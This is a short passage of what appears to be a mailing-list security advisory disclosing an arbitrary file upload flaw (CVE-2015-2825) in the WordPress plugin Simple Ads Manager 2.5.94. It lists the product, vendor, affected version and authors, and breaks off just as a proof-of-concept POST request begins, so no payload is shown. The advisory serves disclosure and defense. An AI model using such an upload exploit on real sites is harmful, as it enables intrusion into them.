Posted by ITAS Team on Apr 05

#Vulnerability title: WordPress plugin Simple Ads Manager – Arbitrary File
Upload
#Product: WordPress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.tran () itas vn) & ITAS Team

::PROOF OF CONCEPT::

+ REQUEST
POST…